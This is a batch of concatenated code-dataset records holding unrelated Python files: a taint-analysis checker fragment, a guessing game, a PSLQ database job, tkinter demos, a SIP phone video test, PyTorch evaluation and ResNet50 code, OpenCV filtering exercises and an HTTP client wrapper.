assignments\n\tast = id_nodes(ast)\t\n\tpath = None\n\t\n\t# find path from sinks to a possible entry point\n\tfor sink in sinks:\n\t\t# print(sink)\n\t\tpath = path_from_sink_to_entry(ast, sink, subpatterns)\n\t\tif path is not None:\n\t\t\tbreak\n\t\t\n\t# compute the result\n\tif path is None:\n\t\tresult = 'Vulnerability: None\\n'\n\t\t\n\telse:\n\t\tresult = \"\"\n\t\tfor element in path:\n\t\t\tfor subpattern in subpatterns:\n\t\t\t\tif element not in subpattern.validation_funcs:\n\t\t\t\t\tresult += \"Vulnerability: \" + subpattern.name + \"\\n\" \\\n\t\t\t\t\t\t\t+ \"Entry point: \" + path[0] + \"\\n\" \\\n\t\t\t\t\t\t\t+ \"Sensitive Sink: \" + path[-1] + \"\\n\"\n\t\t\t\t\treturn result\n\n\treturn result\n\n\n","sub_path":"src/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":3589,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"332495807","text":"import random\n\n\"\"\"This module contain a function guess which is a guess game.\"\"\"\n\ndef guessGame():\n\n \"\"\"you have enter a randome choice b/w 1,50 if you guess correct then you will win else you \\\n you have only 5 chances.\n\n \"\"\"\n comGuess = random.randint(1,100)\n\n c = 1\n\n while c:\n\n userGuess = int(input(\"Enter Your Guess - \"))\n\n if comGuess < userGuess :\n\n print(\"Think Lower Be in your limits \")\n\n elif comGuess > userGuess :\n\n print(\"Be Big Think Big \")\n\n else:\n\n print(\"Yeah!!You have won the game\")\n break\n \n if c == 5 :\n\n print(\"You such a looser\")\n break\n \n\n else:\n\n c += 1\n \n\nif __name__ == \"__main__\" :\n\n guessGame()\n","sub_path":"New_morning_batch/new/mypkg/mymod/guess.py","file_name":"guess.py","file_ext":"py","file_size_in_byte":799,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"403865626","text":"from db import models\nfrom db import ramanujan_db\nimport mpmath as mp\nimport time\nfrom sqlalchemy import Integer, or_, Float\nfrom sqlalchemy.orm.attributes import flag_modified\nfrom sqlalchemy.sql.expression import func\nfrom jobs import pslq_utils\nimport logging\nimport logging.config\nimport sys\nimport os\n\nmp.mp.dps = 2000\n\nALGORITHM_NAME = 'PSLQ_CF_CONST'\nLOGGER_NAME = 'job_logger'\nBULK_SIZE = 500\n\nFILTERS = [\n models.Cf.precision_data != None,\n models.Cf.precision_data.has(models.CfPrecision.precision > 100),\n models.Cf.precision_data.has(models.CfPrecision.general_data != None),\n models.Cf.precision_data.has(models.CfPrecision.general_data['rational'].cast(Float) == 0.0),\n or_(models.Cf.scanned_algo == None, ~models.Cf.scanned_algo.has_key(ALGORITHM_NAME))\n ]\n\ndef get_filters(num_denom_factor):\n filters = FILTERS\n if num_denom_factor is not None:\n factor, strict = num_denom_factor\n num_deg = func.cardinality(models.Cf.partial_numerator) - 1\n denom_deg = func.cardinality(models.Cf.partial_denominator) - 1\n if factor > 0:\n low_deg = denom_deg * factor\n high_deg = num_deg\n else:\n low_deg = num_deg * abs(factor)\n high_deg = denom_deg\n\n if strict:\n new_filter = low_deg == high_deg\n else:\n new_filter = low_deg <= high_deg\n\n filters = [new_filter] + filters\n\n return filters \n\ndef check_cf_to_const(cf_value, const_value):\n if const_value == 1:\n return None\n\n result = pslq_utils.check_int_null_vector(mp.mpf(str(const_value)), cf_value)\n if result:\n logging.getLogger(LOGGER_NAME).info('Found connection')\n\n return result\n\ndef check_cf(cf, constants):\n logging.getLogger(LOGGER_NAME).info(f'checking cf: {cf.cf_id}: {cf.partial_numerator}, {cf.partial_denominator}')\n connection_data = None\n cf_precision = cf.precision_data.precision\n for const in constants:\n logging.getLogger(LOGGER_NAME).debug(f'checking const {const.name} with cf {cf.cf_id}')\n mp.mp.dps = min(const.precision, cf_precision) * 9 // 10\n cf_value = mp.mpf(str(cf.precision_data.previous_calc[2])) / mp.mpf(str(cf.precision_data.previous_calc[3]))\n result = check_cf_to_const(cf_value, const.value)\n if result:\n if connection_data:\n # TODO: Report because we found 2 different constants\n logging.getLogger(LOGGER_NAME).critical(f'found connection to multiple constants. cf_id: {cf.cf_id}')\n connection_data = models.CfConstantConnection(cf_id=cf.cf_id, constant_id=const.constant_id, connection_type=\"PSLQ\", connection_details=result)\n \n return connection_data\n\ndef execute_job(query_data):\n logging.config.fileConfig('logging.config', defaults={'log_filename': f'pslq_const_worker_{os.getpid()}'})\n db_handle = ramanujan_db.RamanujanDB()\n connections = []\n cfs = []\n for cf in query_data:\n connection_data = check_cf(cf, db_handle.constants)\n if connection_data:\n connections.append(connection_data)\n if not cf.scanned_algo:\n cf.scanned_algo = dict()\n cf.scanned_algo[ALGORITHM_NAME] = int(time.time())\n # for postgres < 9.4\n flag_modified(cf, 'scanned_algo')\n cfs.append(cf)\n logging.getLogger(LOGGER_NAME).info(f'finished - worked on {len(cfs)} cfs - found {len(connections)} results')\n db_handle.session.add_all(cfs)\n db_handle.session.add_all(connections)\n db_handle.session.commit()\n db_handle.session.close()\n \n logging.getLogger(LOGGER_NAME).info(f'Commit done')\n\n return len(cfs), len(connections)\n\ndef run_query(bulk=0, num_denom_factor=None):\n logging.config.fileConfig('logging.config', defaults={'log_filename': f'pslq_const_manager'})\n if not bulk:\n bulk = BULK_SIZE\n logging.getLogger(LOGGER_NAME).debug(f'Starting to check connections, bulk size: {bulk}')\n db_handle = ramanujan_db.RamanujanDB()\n results = db_handle.session.query(models.Cf).filter(*get_filters(num_denom_factor)).limit(bulk).all()\n db_handle.session.close()\n logging.getLogger(LOGGER_NAME).info(f'size of batch is {len(results)}')\n return results\n\ndef summarize_results(results):\n total_cfs = 0\n total_connections = 0\n for cfs, connections in results:\n total_cfs += cfs\n total_connections += connections\n logging.getLogger(LOGGER_NAME).info(f'Total iteration over: {total_cfs} cfs, found {total_connections} connections')\n\ndef run_one(cf_id, db_handle,write_to_db=False):\n #db_handle = ramanujan_db.RamanujanDB()\n cf = db_handle.session.query(models.Cf).filter(models.Cf.cf_id == cf_id).first()\n connection_data = check_cf(cf, db_handle.constants)\n if write_to_db:\n if not cf.scanned_algo:\n cf.scanned_algo = dict()\n cf.scanned_algo[ALGORITHM_NAME] = int(time.time())\n # for postgres < 9.4\n flag_modified(cf, 'scanned_algo')\n\n db_handle.session.add_all([cf])\n if connection_data:\n db_handle.session.add_all([connection_data])\n db_handle.session.commit()\n # db_handle.session.close()\n\n return connection_data\n","sub_path":"jobs/job_const_cf_pslq.py","file_name":"job_const_cf_pslq.py","file_ext":"py","file_size_in_byte":5240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"611469095","text":"import tkinter as tk\n\nwindow = tk.Tk()\nwindow.title('my window')\nwindow.geometry('200x200')\n\n# Create a Label\nl = tk.Label(window, bg='yellow', width=20, text=None)\nl.pack()\n\n# Function for Checkbutton\ndef print_selection():\n if (var1.get() == 1) and (var2.get() == 0):\n l.config(text='I love only Python')\n elif (var1.get() == 0) and (var2.get() == 1):\n l.config(text='I love only C++')\n elif (var1.get() == 0) and (var2.get() == 0):\n l.config(text='I don\\'t love either')\n else:\n l.config(text='I love both')\n\nvar1 = tk.IntVar()\nvar2 = tk.IntVar()\n# Define Checkbutton\n# onvalue means the represented value when selected\nc1 = tk.Checkbutton(window, text='Python',variable=var1, onvalue=1, offvalue=0,\n command=print_selection)\nc2 = tk.Checkbutton(window, text='C++',variable=var2, onvalue=1, offvalue=0,\n command=print_selection)\nc1.pack()\nc2.pack()\n\n\nwindow.mainloop()\n","sub_path":"gui_checkbutton.py","file_name":"gui_checkbutton.py","file_ext":"py","file_size_in_byte":966,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"186039533","text":"\"\"\"\nCopyright (c) 2018 Cisco Systems, Inc.\n\nAuthor:\n Christian Oeien \n\"\"\"\nfrom tng.api import runner\nfrom tng.device.endpoint.synergylite_3pcc import BigEasyVideo3pcc\nfrom tng_sl.contrib.pitstop_helper import PitstopTestCase\nfrom pitstop.exp import Send, Receive, Command, Poll, LocalAnswer, Wait, Flag\n\n\nclass Test(PitstopTestCase):\n\n required_caps = ['video']\n\n def test_originate_and_resume_video(self):\n '''\n have DUT originate new call. Offer must include a video media line,\n given a video capable DUT. Also verify same behaviour on resume SDP\n and in this case the far-end as opposed to DUT, initiates the hangup\n MPP Behavior: Video m line is deleted on a Hold-offer for audio calls\n on video phones.\n Bonus: -that video is not enabled on peer so DUT adds at each offer.\n -verify video-parameters announced like the profile-level-id.\n -star-syntax when zero-porting is parsed by DUT i.e no crash.\n '''\n\n offer_verify = [\n (\"\\n\", \"profile-level-id=42\"),\n (\"\\n\", \"profile-level-id=64\"),\n (\"\\n\", \"packetization-mode=0\")]\n\n api = self.oPhone1.ccapi\n cid = \"0000\" # <-- you know 1st call on 1st line is default on .dut\n self.spec.update({\n \"test\": [\n Wait(\"idle\").then([\n Command(self.dut.make_call, \"0\")]),\n Receive(\n \"INVITE\", {}, transaction_label=\"i\",\n captures={\"a\": \"\\n(^v=0.+video.+)\"},\n verify=offer_verify).then([\n Send(\"180\", {}, on_transaction=\"i\")]),\n Poll(self.dut.is_proceeding).then([\n LocalAnswer(\"$a\", \"A\"),\n Send(\n \"200\", {\"\\n\": \"$A\"},\n on_transaction=\"i\", dialog_label=\"d\")]),\n Receive(\"ACK\", {}, in_dialog=\"d\").then([\n Command(api.hold, cid)]),\n Receive(\n \"INVITE\", {}, transaction_label=\"j\", in_dialog=\"d\",\n captures={\"b\": \"\\n(^v=0.+audio.+a=sendonly.+)\"}).then([\n LocalAnswer(\"$b\", \"B\"),\n Send(\"200\", {\"\\n\": \"$B\"}, on_transaction=\"j\")]),\n Receive(\"ACK\", {}, in_dialog=\"d\").then([\n Command(api.resume, cid)]),\n Receive(\n \"INVITE\", {}, transaction_label=\"k\", in_dialog=\"d\",\n captures={\"c\": \"\\n(^v=0.+video [^0].+)\"},\n verify=offer_verify).then([\n LocalAnswer(\"$c\", \"C\"),\n Send(\"200\", {\"\\n\": \"$C\"}, on_transaction=\"k\")]),\n Receive(\"ACK\", {}, in_dialog=\"d\").then([\n Send(\"BYE\", {}, in_dialog=\"d\", transaction_label=\"q\")]),\n Receive(\"200\", {}, on_transaction=\"q\").then([]),\n Poll(self.dut.is_line_idle).then([Flag(\"idle\")])]})\n\n self.pitstop()\n\n\ndef main():\n runner()\n","sub_path":"pitstop_tests/video/originate_and_resume_video.py","file_name":"originate_and_resume_video.py","file_ext":"py","file_size_in_byte":3060,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"152738278","text":"import argparse\nimport os\nimport sys\n\nimport torch\nimport torch.nn.parallel\nimport torch.nn.functional as nn_func\nimport torchvision.transforms as transforms\nimport torch.utils.data.distributed\nfrom tqdm import tqdm\n\n# Replace this with your data loader and edit the calls accordingly\nfrom data_loader import EvalDataset\n\n\ndef get_parser():\n \"\"\"\"Defines the command line arguments\"\"\"\n parser = argparse.ArgumentParser(description='Open World Vision')\n parser.add_argument('--input_file', required=True,\n help='path to a .txt/.csv file containing paths of input images in first column of each row. '\n '\\',\\' will be used as a delimiter if a csv is provided. In text format, each row should'\n ' only contain the path of an image.')\n parser.add_argument('--out_dir', required=True,\n help='directory to be used to save the results. We will save a \\',\\' separated csv which will'\n ' be named by the next argument: ')\n parser.add_argument('--exp_name', required=True,\n help='unique name for this run of the evaluation')\n parser.add_argument('--model_path', required=True,\n help='path to model file')\n parser.add_argument('-j', '--workers', default=4, type=int, metavar='N',\n help='number of data loading workers (default: 4)')\n parser.add_argument('-b', '--batch-size', default=32, type=int)\n parser.add_argument('--accimage', action='store_true',\n help='use if accimage module is available on the system and you want to use it')\n return parser\n\n\ndef run(model_path, data_file, exp_name, out_dir, accimage=False, batch_size=32, workers=4):\n \"\"\"Runs the model on given data and saves the class probabilities\n\n Args:\n model_path (str): path to pytorch model file\n data_file (str): path to txt/csv file containing input images. If txt each line should only contain the path of\n an image. If csv, 1st column should have image paths\n exp_name (str): unique name for the experiment. Will be used to save output\n out_dir (str): path to dump output files\n accimage (bool): whether to use accimage loader. If calling this function outside this module, please make sure\n that accimage is importable in your python env\n batch_size (int): batchsize for model\n workers (int): no. of workers to be used in dataloader\n \"\"\"\n try:\n checkpoint = torch.load(model_path)\n model = checkpoint['model']\n model = torch.nn.DataParallel(model).cuda()\n model.load_state_dict(checkpoint['state_dict'])\n\n # switch to evaluate mode\n model.eval()\n\n with torch.no_grad():\n # Replace this with your data-loader\n test_set = EvalDataset(\n data_file=data_file,\n accimage=accimage,\n transform=transforms.Compose([\n transforms.Resize(256),\n transforms.CenterCrop(224),\n transforms.ToTensor(),\n transforms.Normalize(mean=[0.5, 0.5, 0.5],\n std=[0.5, 0.5, 0.5]),\n ]),\n header=True,\n )\n\n img_path_list = test_set.data_list\n test_loader = torch.utils.data.DataLoader(\n test_set,\n batch_size=batch_size,\n shuffle=False,\n num_workers=workers,\n pin_memory=True)\n\n img_idx_list = list()\n output_list = list()\n for img_idx, images in tqdm(test_loader):\n images = images.cuda()\n output = model(images)\n\n # Adjust these according to your model\n # output = nn_func.softmax(output[0], 1)\n output = nn_func.softmax(output[:, :413], 1).cpu()\n zero_vec = torch.zeros((output.shape[0], 1))\n output = torch.cat([zero_vec, output], dim=1)\n\n img_idx_list.append(img_idx)\n output_list.append(output)\n img_idx_list = torch.cat(img_idx_list, 0)\n output_list = torch.cat(output_list, 0)\n\n lines = list()\n for i, img_idx in enumerate(img_idx_list):\n line = [str(x) for x in output_list[i].tolist()]\n lines.append(','.join([img_path_list[img_idx]] + line))\n with open(os.path.join(out_dir, f'{exp_name}.csv'), 'w') as f:\n f.write('\\n'.join(lines))\n except FileNotFoundError:\n print(f'Could not find the model file at {model_path}')\n except KeyError:\n print(f'Saved model does not have expected format. We expect the checkpoint to have \\'model\\' and '\n f'\\'state_dict\\' keys')\n except Exception as e:\n print(e)\n\n\ndef main():\n parser = get_parser()\n args = parser.parse_args()\n if args.accimage:\n try:\n import accimage\n except ModuleNotFoundError:\n print('You opted for using accimage but we are unable to import it. Process will be terminated.')\n sys.exit()\n\n run(args.model_path, args.input_file, args.exp_name, args.out_dir, args.accimage, args.batch_size, args.workers)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"backup/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":5432,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"357778079","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n\nclass ConvBlock(nn.Module):\n def __init__(self, in_channels=32, out_channels=32, kernel_size=3, down_sample=False):\n super(ConvBlock, self).__init__()\n self.down_sample = down_sample\n\n self.conv1 = nn.Conv2d(in_channels=in_channels, out_channels=out_channels, kernel_size=kernel_size,\n stride=2 if down_sample else 1, padding=0 if kernel_size == 1 else 1)\n self.bn1 = nn.BatchNorm2d(out_channels)\n\n def forward(self, input_tensor):\n x = self.conv1(input_tensor)\n x = self.bn1(x)\n return x\n\n\nclass ResBlock(nn.Module):\n def __init__(self, in_channels=32, out_channels=32, down_sample=False, first=False):\n super(ResBlock, self).__init__()\n self.down_sample = down_sample\n self.first = first\n\n self.conv_block1 = ConvBlock(in_channels=in_channels, out_channels=out_channels // 4, kernel_size=1, down_sample=down_sample)\n self.conv_block2 = ConvBlock(in_channels=out_channels // 4, out_channels=out_channels // 4, kernel_size=3)\n self.conv_block3 = ConvBlock(in_channels=out_channels // 4, out_channels=out_channels, kernel_size=1)\n\n if self.down_sample:\n self.shortcut = ConvBlock(in_channels=in_channels, out_channels=out_channels, kernel_size=1, down_sample=True)\n elif self.first:\n self.shortcut = ConvBlock(in_channels=in_channels, out_channels=out_channels, kernel_size=1)\n\n def forward(self, input_tensor):\n x = self.conv_block1(input_tensor)\n x = F.relu(x)\n x = self.conv_block2(x)\n x = F.relu(x)\n x = self.conv_block3(x)\n\n if self.down_sample:\n input_tensor = self.shortcut(input_tensor)\n elif self.first:\n input_tensor = self.shortcut(input_tensor)\n\n x = x + input_tensor\n x = F.relu(x)\n return x\n\n\nclass ResNet50(nn.Module):\n def __init__(self, in_channels=3, num_classes=10):\n super(ResNet50, self).__init__()\n\n self.conv1 = nn.Conv2d(in_channels=in_channels, out_channels=64, kernel_size=7, stride=2, padding=3)\n self.bn1 = nn.BatchNorm2d(64)\n self.maxpool1 = nn.MaxPool2d(kernel_size=3, stride=2, padding=1)\n\n self.conv2_x = nn.Sequential(\n ResBlock(in_channels=64, out_channels=256, first=True),\n ResBlock(in_channels=256, out_channels=256),\n ResBlock(in_channels=256, out_channels=256)\n )\n self.conv3_x = nn.Sequential(\n ResBlock(in_channels=256, out_channels=512, down_sample=True),\n ResBlock(in_channels=512, out_channels=512),\n ResBlock(in_channels=512, out_channels=512),\n ResBlock(in_channels=512, out_channels=512),\n )\n self.conv4_x = nn.Sequential(\n ResBlock(in_channels=512, out_channels=1024, down_sample=True),\n ResBlock(in_channels=1024, out_channels=1024),\n ResBlock(in_channels=1024, out_channels=1024),\n ResBlock(in_channels=1024, out_channels=1024),\n ResBlock(in_channels=1024, out_channels=1024),\n ResBlock(in_channels=1024, out_channels=1024),\n )\n self.conv5_x = nn.Sequential(\n ResBlock(in_channels=1024, out_channels=2048, down_sample=True),\n ResBlock(in_channels=2048, out_channels=2048),\n ResBlock(in_channels=2048, out_channels=2048)\n )\n self.avg = nn.AdaptiveAvgPool2d(1)\n self.fc = nn.Linear(2048, num_classes)\n\n def forward(self, input_tensor):\n x = self.conv1(input_tensor)\n x = self.bn1(x)\n x = F.relu(x)\n x = self.maxpool1(x)\n\n x = self.conv2_x(x)\n x = self.conv3_x(x)\n x = self.conv4_x(x)\n x = self.conv5_x(x)\n x = self.avg(x)\n x = x.view(x.size(0), -1)\n x = self.fc(x)\n return x\n\n","sub_path":"models/ResNet50.py","file_name":"ResNet50.py","file_ext":"py","file_size_in_byte":3917,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"449800731","text":"import cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nimg = cv2.imread('/Users/sty/PycharmProjects/My_world/CNN_CV/Lesson_1/Data/lenna.jpg', 1)\n\ndef my_show(img):\n plt.imshow(cv2.cvtColor(img, cv2.COLOR_BGR2RGB))\n plt.show()\n\ndef my_show2(img1,img2):\n plt.subplot(121)\n my_show(img1)\n plt.subplot(122)\n my_show(img2)\n plt.show()\n\n# 一阶导图像\n# 高斯滤波\ng_img = cv2.GaussianBlur(img, (11, 11), 2)\n# my_show(g_img)\n\n# 高斯算子\nkernel_1d = cv2.getGaussianKernel(11, 2)\nprint(kernel_1d)\n# 拿到算子,卷积sepFilter2D(一阶高斯参数:分别对X轴方向和Y轴方向求导)\ng1_img = cv2.sepFilter2D(img, -1, kernel_1d, kernel_1d)\n# my_show(g1_img)\n\n# laplacian\n# 二阶求导算子\nkernel = np.array([[0,1,0],[1,-4,1],[0,1,0]])\nlap_img1 = cv2.filter2D(img, -1, kernel)\n# my_show(lap_img1)\n\nkernel_strong = np.array([[1,1,1],[1,-8,1],[1,1,1]])\nlap_img2 = cv2.filter2D(img, -1, kernel_strong)\n\n# plt.figure(figsize=(10,5),dpi=120)\nplt.subplot(121)\nmy_show(lap_img1)\nplt.subplot(122)\nmy_show(lap_img2)\nplt.show()\n\n# 图片锐化,相当于在原图上加一层边缘(kernel中间像素+1)\nkernel_r = np.array([[-1,-1,-1],[-1,10,-1],[-1,-1,-1]])\nr_img = cv2.filter2D(img, -1, kernel_r)\nplt.subplot(121)\nmy_show(img)\nplt.subplot(122)\nmy_show(r_img)\nplt.show()\n\nkernel_r2 = np.array([[0,-1,0],[-1,5,-1],[0,-1,0]])\nr_img2 = cv2.filter2D(img, -1, kernel_r2)\nplt.subplot(121)\nmy_show(img)\nplt.subplot(122)\nmy_show(r_img2)\nplt.show()\n\n# sobel\n# 一阶求导算子\n\n# y轴求导\nkernel_sx = np.array([[-1,-2,-1],[0,0,0],[1,2,1]])\nsx_img = cv2.filter2D(img, -1, kernel_sx)\n# x轴求导\nkernel_sy = np.array([[-1,0,-1],[-2,0,2],[1,0,1]])\nsy_img = cv2.filter2D(img, -1, kernel_sy)\nplt.subplot(121)\nmy_show(sx_img)\nplt.subplot(122)\nmy_show(sy_img)\nplt.show()\n\n# medianblur\n\nn_img = cv2.imread('/Users/sty/PycharmProjects/My_world/CNN_CV/Lesson_2/Data/noise_lenna.jpg')\nmd_img = cv2.medianBlur(n_img, 7)\ngd_img = cv2.GaussianBlur(n_img,(3,3),2)\n\nplt.subplot(131)\nmy_show(n_img)\nplt.subplot(132)\nmy_show(md_img)\nplt.subplot(133)\nmy_show(gd_img)\nplt.show()\n\n# Harris Corner\n\n# def my_show_gray(img):\n# plt.imshow(cv2.cvtColor(img, cv2.COLOR_BGR2GRAY),cmap='gray')\n\n# my_show_gray(img)\n# plt.show()\n\nimg_harris = cv2.cornerHarris(cv2.cvtColor(img,cv2.COLOR_BGR2GRAY), 2, 3, 0.03)\nthreshold = np.max(img_harris) * 0.02\n\nimg[img_harris > threshold] = [0, 0, 255]\nmy_show(img)\n\n\nimg_t = cv2.imread('/Users/sty/PycharmProjects/My_world/CNN_CV/Lesson_2/Data/test_corner.jpg')\nmy_show(img_t)\n\nimg_tgray = cv2.cvtColor(img_t, cv2.COLOR_BGR2GRAY)\n# img_tgray = cv2.dilate(img_tgray, None) # 扩展一下\nimg_tH = cv2.cornerHarris(img_tgray, 2, 3, 0.03)\n# img_tH = cv2.dilate(img_tH, None) # 扩展一下\n\nthreshold2 = np.max(img_tH) * 0.02\nimg_t[img_tH > threshold2] = [0, 0, 255]\nmy_show(img_t)\n\n# SIFT\n\nsift = cv2.xfeatures2d.SIFT_create()\nkp = sift.detect(img)\n\nprint(len(kp))\nkp, des = sift.compute(img, kp)\nprint(des.shape)\n\nimg_sift = cv2.drawKeypoints(img, kp, outImage=np.array([]), flags=cv2.DRAW_MATCHES_FLAGS_DRAW_RICH_KEYPOINTS)\n\nplt.figure(figsize=(10,10),dpi=100)\nmy_show(img_sift)\n","sub_path":"CNN_CV/Lesson_2/recode_l2.py","file_name":"recode_l2.py","file_ext":"py","file_size_in_byte":3128,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"307862284","text":"# -*- coding: utf-8 -*-\ntry:\n from .base_httpclient import BaseHttpClient\n from .logger import LoggerFactory\n from .exception import RequestErrorException\nexcept Exception:\n from fangcloudsdk.base_httpclient import BaseHttpClient\n from fangcloudsdk.logger import LoggerFactory\n from fangcloudsdk.exception import RequestErrorException\n\n\nclass RequestClient(object):\n def __init__(self):\n self.request_session = BaseHttpClient()\n self.logger = LoggerFactory.get_logger_instance()\n\n def send(\n self,\n url=None,\n method=None,\n headers=None,\n params=None,\n data=None,\n postbody=None,\n auth=None,\n oauth=None,\n stream=False,\n *args,\n **kwargs\n ):\n method = str.upper(method)\n if method == \"GET\":\n response = self.request_session.get(\n url=url, headers=headers, params=params, stream=stream\n )\n elif method == \"POST\":\n response = self.request_session.post(\n url=url, headers=headers, params=params, data=data, postbody=postbody, auth=auth\n )\n elif method == \"PUT\":\n response = self.request_session.put(\n url=url, headers=headers, data=data, postbody=postbody\n )\n elif method == \"DELETE\":\n response = self.request_session.delete(\n url=url, headers=headers, data=data, postbody=postbody\n )\n else:\n raise RequestErrorException(\"request method is not support\")\n # self.logger.debug(\"request log:\\nurl => %s\\nmethod => %s\\nheader => %s\\nparams => %s\\ndata => %s\\npostbody => %s\",\n # url, method, headers, params, data, postbody)\n self.logger.debug(\n \"request log: [url: %s], [method, %s], [header, %s], [params, %s], [data, %s], [postbody, %s]\",\n url, method, headers, params, data, postbody)\n if str(response.headers['Content-Type']) == \"image/jpeg;charset=utf-8\":\n response_json = \"is image\"\n else:\n response_json = response.json()\n self.logger.debug(\"response log: status [code: %s], [json=%s]\", response.status_code, response_json)\n return response\n","sub_path":"python-sdk/fangcloudsdk/request_client.py","file_name":"request_client.py","file_ext":"py","file_size_in_byte":2327,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"259859641","text":"import tkinter as tk\nimport sqlite3\n\n\nclass SettingsWindow:\n def __init__(self, master):\n self.master = master\n self.master.geometry(\"750x500+0+0\")\n self.master.title(\"Settings\")\n self.master.theme = \"grey50\"\n self.master.config(bg=\"grey50\")\n try:\n self.master.iconbitmap(\"images/settings.ico\")\n except:\n pass\n self.showWidgets()\n self.extractSettingsData()\n\n def showWidgets(self):\n '''Shows the widgets of GUI'''\n textcolor = \"yellow2\"\n textcolor1 = \"White\"\n font1 = \"Arial 8 normal\"\n font2 = \"Cascadia 12 normal\"\n frame1 = tk.Frame(self.master, bg=self.master.theme)\n frame1.pack(anchor=\"w\")\n tk.Label(frame1, text=\"App Settings\", fg=\"white\", bg=self.master.theme, font=\"Franklin 22 bold\", anchor=\"w\",\n underline=True).pack(side=tk.LEFT, padx=10, pady=20)\n frame2 = tk.Frame(self.master, bg=self.master.theme)\n frame2.pack(anchor=\"w\", padx=10)\n self.master.optional_label = tk.StringVar()\n self.master.default_city = tk.StringVar()\n self.master.default_state = tk.StringVar()\n self.master.default_note = tk.StringVar()\n self.master.table_label_1 = tk.StringVar()\n self.master.print_heading = tk.StringVar()\n self.master.busniess_name = tk.StringVar()\n self.master.address_line1 = tk.StringVar()\n self.master.address_line2 = tk.StringVar()\n self.master.address_line3 = tk.StringVar()\n tk.Label(frame2, text=\"Edit Required place and Press ok to save\", bg=self.master.theme, fg=textcolor,\n font=font1).grid()\n tk.Label(frame2, text=\"Optional Field Name\", bg=self.master.theme, fg=textcolor1, font=font2).grid(row=1,\n sticky=\"e\",\n pady=3)\n tk.Entry(frame2, textvariable=self.master.optional_label, font=font2, width=50).grid(row=1, column=1, pady=3)\n tk.Label(frame2, text=\"Default City\", bg=self.master.theme, fg=textcolor1, font=font2).grid(row=2, sticky=\"e\",\n pady=3)\n tk.Entry(frame2, textvariable=self.master.default_city, font=font2, width=50).grid(row=2, column=1, pady=3)\n tk.Label(frame2, text=\"Default state\", bg=self.master.theme, fg=textcolor1, font=font2).grid(row=3, sticky=\"e\",\n pady=3)\n tk.Entry(frame2, textvariable=self.master.default_state, font=font2, width=50).grid(row=3, column=1, pady=3)\n tk.Label(frame2, text=\"Default text for optional field\", bg=self.master.theme, fg=textcolor1, font=font2).grid(\n row=4, sticky=\"e\", pady=3)\n tk.Entry(frame2, textvariable=self.master.default_note, font=font2, width=50).grid(row=4, column=1, pady=3)\n tk.Label(frame2, text=\"Table Heading\", bg=self.master.theme, fg=textcolor1, font=font2).grid(row=5, sticky=\"e\",\n pady=3)\n tk.Entry(frame2, textvariable=self.master.table_label_1, font=font2, width=50).grid(row=5, column=1, pady=3)\n tk.Label(frame2, text=\"Print Heading\", bg=self.master.theme, fg=textcolor1, font=font2).grid(row=6, sticky=\"e\",\n pady=3)\n tk.Entry(frame2, textvariable=self.master.print_heading, font=font2, width=50).grid(row=6, column=1, pady=3)\n tk.Label(frame2, text=\"Busniess Name\", bg=self.master.theme, fg=textcolor1, font=font2).grid(row=7, sticky=\"e\",\n pady=3)\n tk.Entry(frame2, textvariable=self.master.print_heading, font=font2, width=50).grid(row=7, column=1, pady=3)\n tk.Label(frame2, text=\"Address Line1\", bg=self.master.theme, fg=textcolor1, font=font2).grid(row=8, sticky=\"e\",\n pady=3)\n tk.Entry(frame2, textvariable=self.master.address_line1, font=font2, width=50).grid(row=8, column=1, pady=3)\n tk.Label(frame2, text=\"Address Line2\", bg=self.master.theme, fg=textcolor1, font=font2).grid(row=9, sticky=\"e\",\n pady=3)\n tk.Entry(frame2, textvariable=self.master.address_line2, font=font2, width=50).grid(row=9, column=1, pady=3)\n tk.Label(frame2, text=\"Address Line3\", bg=self.master.theme, fg=textcolor1, font=font2).grid(row=10, sticky=\"e\",\n pady=3)\n tk.Entry(frame2, textvariable=self.master.address_line3, font=font2, width=50).grid(row=10, column=1, pady=3)\n frame3 = tk.Frame(self.master, bg=self.master.theme)\n frame3.pack(anchor=\"w\", padx=10)\n tk.Button(frame3, text=\"Save\", font=font2, bd=3, relief=tk.RAISED, command=self.updateSettings).pack(padx=30,\n pady=10,\n side=tk.LEFT)\n tk.Button(frame3, text=\"Close\", font=font2, bd=3, relief=tk.RAISED, command=self.master.destroy).pack(pady=10,\n padx=4,\n side=tk.LEFT)\n\n def extractSettingsData(self):\n '''Exatracts settings data fom database and set the widgets'''\n conn = sqlite3.connect(\"DB/database\")\n cursor = conn.cursor()\n cursor.execute(\"SELECT * FROM appdata WHERE srl='1'\")\n for data in cursor:\n self.master.optional_label.set(self.recover(data[1]))\n self.master.default_city.set(self.recover(data[2]))\n self.master.default_state.set(self.recover(data[3]))\n self.master.default_note.set(self.recover(data[4]))\n self.master.table_label_1.set(self.recover(data[5]))\n self.master.print_heading.set(self.recover(data[6]))\n self.master.busniess_name.set(self.recover(data[7]))\n self.master.address_line1.set(self.recover(data[8]))\n self.master.address_line2.set(self.recover(data[9]))\n self.master.address_line3.set(self.recover(data[10]))\n cursor.close()\n conn.close()\n\n def updateSettings(self):\n optional_label = self.master.optional_label.get()[:50]\n default_city = self.master.default_city.get()[:50]\n default_state = self.master.default_state.get()[:50]\n default_note = self.master.default_note.get()[:50]\n table_label_1 = self.master.table_label_1.get()[:50]\n print_heading = self.master.print_heading.get()[:150]\n busniess_name = self.master.busniess_name.get()[:150]\n address_line1 = self.master.address_line1.get()[:150]\n address_line2 = self.master.address_line2.get()[:150]\n address_line3 